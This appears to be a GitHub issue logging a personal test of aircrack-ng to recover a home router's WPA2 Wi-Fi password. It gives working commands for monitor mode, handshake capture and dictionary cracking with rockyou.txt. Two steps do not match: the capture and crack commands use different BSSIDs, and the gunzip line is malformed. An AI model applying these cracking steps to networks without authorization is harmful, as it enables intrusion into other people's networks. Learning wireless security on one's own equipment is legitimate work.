Open anitsh opened 4 years ago
Objectives: Access home router wifi password
Conclusion: From the usage of the tool, it simply does is to compare the passwords in the list to identify the password.
Steps:
- Install Kali Linux on docker
Install aircrack-ng, and pciutils
apt-get install -y aircrack-ng pciutils
Save the container's state in a new image
Run new container image
docker run -it --net="host" --privileged --name aircrack kali-aircrack bash
Get the name of the wifi device
iwconfig
Start airmon-ng to monitor the wifi
airmon-ng start wlp9s0
// wifi device name wlp9s0
may vary
// Internet will not work now
// Device now will be named such as wlp9s0mon
List out the wifi devices in the area.
airodump-ng wlp9s0mon
// Let it list out the devices. Then exit.
// Select the device's MAC address(BSSID) and CH for the penetration test.
Capture exchanged 802.11 frames in that device using BSSID and CH
airodump-ng --bssid 88:B3:62:24:2D:69 -c 4 wlp9s0mon --write /tmp/handshake.cap
// For easy read dump to a file
There is a default password provided by Kali. Unarchive the passwords file.
gunzip /usr/share/wordlists/rockyou.txt.gz /usr/share/wordlists/rockyou.txt
Crack the password from the device captured data.
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt handshake.cap
// Here -a2
is the ENC(encryption) type for WPA2. -a
for WPA.
If there is a password match it will provide the password.
Further research could be done with:
and find other methods and tools.
Aircrack-ng is a complete suite of tools to assess WiFi network security.